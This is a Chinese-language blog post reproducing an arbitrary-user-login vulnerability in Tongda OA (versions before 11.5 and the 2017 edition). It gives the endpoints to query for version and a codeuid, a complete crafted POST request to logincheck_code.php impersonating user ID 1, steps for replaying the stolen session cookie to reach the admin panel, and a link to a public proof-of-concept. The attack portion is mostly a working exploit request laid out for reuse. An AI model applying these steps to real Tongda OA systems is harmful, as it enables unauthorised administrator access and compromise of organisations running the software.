佚名
发布于

【漏洞左先锋】【OA漏洞】通达OA v11.5 任意用户登录

漏洞详情

利用此漏洞攻击者在远程且未经授权的情况下,通过利用此漏洞,进行任意用户伪造登录。

影响版本

通达OA V11.X<V11.5 通达OA 2017版

漏洞复现

打开首页

查看版本信息 /inc/expired.php

首先访问/ispirit/login_code.php 得到codeuid

利用codeuid构造payload 获取cookie

POST //logincheck_code.php HTTP/1.1
Host: 10.211.55.12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

CODEUID=%7BB8EEE621-DDC1-5DD6-DE24-0DFF12C27713%7D&UID=1


使用脚本获取cookie

访问后台地址 /general/index.php?isIE=0&modify_pwd=0 可以发现未登录

抓包修改cookie进行重放

poc

https://github.com/NS-Sp4ce/TongDaOA-Fake-User

浏览 (160)
点赞 (5)
收藏
打赏
评论